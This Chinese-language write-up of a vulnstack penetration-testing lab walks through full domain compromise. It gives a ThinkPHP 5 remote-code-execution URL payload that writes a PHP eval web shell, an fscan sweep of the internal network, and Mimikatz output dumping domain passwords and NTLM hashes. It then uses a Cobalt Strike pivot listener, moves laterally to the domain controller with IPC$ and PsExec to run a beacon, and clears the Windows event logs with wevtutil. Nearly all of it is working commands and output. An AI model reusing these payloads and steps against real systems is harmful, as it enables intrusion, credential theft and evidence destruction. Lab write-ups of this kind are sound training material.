环境搭建
下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
网络配置
VMnet2和VMnet3 来配置IP
WIN7 配置两张网卡 VMnet2和VMnet3 192.168.135.0,192.168.138.0
WIN2008 只配置 VMnet2 192.168.135.0
web渗透
thinkphp 漏洞利用
通过报错了判断thinkphp版本
执行命令payload
http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写文件payload
http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&&vars[1][]=<?php eval($_POST['a']);?>
内网渗透
信息收集
ipconfig /all
fscan扫描
shell fscan64.exe -h 192.168.138.0/24
(icmp) Target 192.168.138.136 is alive
(icmp) Target 192.168.138.138 is alive
192.168.138.136:445 open
192.168.138.138:88 open
192.168.138.136:3306 open
192.168.138.138:445 open
192.168.138.138:139 open
192.168.138.1:135 open
192.168.138.138:135 open
192.168.138.136:139 open
192.168.138.136:135 open
192.168.138.136:80 open
[+] 192.168.138.136 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle:http://192.168.138.136 code:200 len:931 title:None
[+] NetInfo:
[*]192.168.138.138
[->]DC
[->]192.168.138.138
[+] NetInfo:
[*]192.168.138.1
[->]xian
[->]192.168.32.1
[->]192.168.78.1
[->]192.168.0.101
[->]192.168.135.1
[->]192.168.138.1
[*] 192.168.138.136 SUN\WIN7 Windows 7 Professional 7601 Service Pack 1
[*] 192.168.138.1 WORKGROUP\XIAN
[+] 192.168.138.138 MS17-010 (Windows Server 2008 HPC Edition 7600)
[*] 192.168.138.138[+]DC SUN\DC Windows Server 2008 HPC Edition 7600
08/06 13:22:00 [+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5-controller-rce
[+] http://192.168.138.136 poc-yaml-thinkphp5023-method-rce poc1
内网总共两台机器,192.168.138.138为域控,192.168.138.136为WIN7域内成员机器
logonpasswords获取密码
使用CS自带的mimikatz读取密码
Authentication Id : 0 ; 277548 (00000000:00043c2c)
Session : CachedInteractive from 1
User Name : Administrator
Domain : SUN
Logon Server : DC
Logon Time : 2023/8/6 12:44:26
SID : S-1-5-21-3388020223-1982701712-4030140183-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SUN
* LM : c8c42d085b5e3da2e9260223765451f1
* NTLM : e8bea972b3549868cecd667a64a6ac46
* SHA1 : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
tspkg :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
wdigest :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
kerberos :
* Username : Administrator
* Domain : SUN.COM
* Password : dc123.com
ssp :
credman :
Authentication Id : 0 ; 153942 (00000000:00025956)
Session : Interactive from 1
User Name : leo
Domain : SUN
Logon Server : DC
Logon Time : 2023/8/6 12:41:12
SID : S-1-5-21-3388020223-1982701712-4030140183-1110
msv :
[00000003] Primary
* Username : leo
* Domain : SUN
* LM : b73a13e9b7832a35aad3b435b51404ee
* NTLM : afffeba176210fad4628f0524bfe1942
* SHA1 : fa83a92197d9896cb41463b7a917528b4009c650
tspkg :
* Username : leo
* Domain : SUN
* Password : 123.com
wdigest :
* Username : leo
* Domain : SUN
* Password : 123.com
kerberos :
* Username : leo
* Domain : SUN.COM
* Password : 123.com
ssp :
credman :
获取到两个用户的账户密码
* Username : Administrator
* Domain : SUN
* Password : dc123.com
* SID: S-1-5-21-3388020223-1982701712-4030140183-500
* Username : leo
* Domain : SUN.COM
* Password : 123.com
* SID: S-1-5-21-3388020223-1982701712-4030140183-1110
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
heart:1000:aad3b435b51404eeaad3b435b51404ee:a34efdd63a23abea4413ba73cafa5a30:::
CobaltStrike中转监听
选择Pivoting -> Listener 新建,已当前192.168.138.136这台内网机器为中转
生成Payload
IPC$横向渗透
使用获取到的账户密码进行横向渗透
net use \\192.168.138.138\ipc$ dc123.com /user:sun\administrator
使用密码建立IPC
将生成的payload上传到内网机器,通过建立IPC$复制文件到DC机器上
shell copy C:\windows\temp\beacon.exe \\192.168.138.138\C$\windows\temp\
查看是否复制成功
shell dir \\192.168.138.138\C$\windows\temp
PsExec执行文件 获取DC域控
通过PsExe执行命令,上线CS
shell C:\windows\temp\PsExec.exe \\192.168.138.138 /accepteula -u sun\administrator -p dc123.com -d C:\windows\temp\beacon.exe
日志清理
统计日志列表,查询所有日志信息,包含时间数目
wevtutil gli Application
查看指定类型日志内容
wevtutil qe /f:text Application
删除该类型日志所有内容
wevtutil cl Application
执行删除所有日志信息,Application的 numberOfLogRecords: 0 为0 清除成功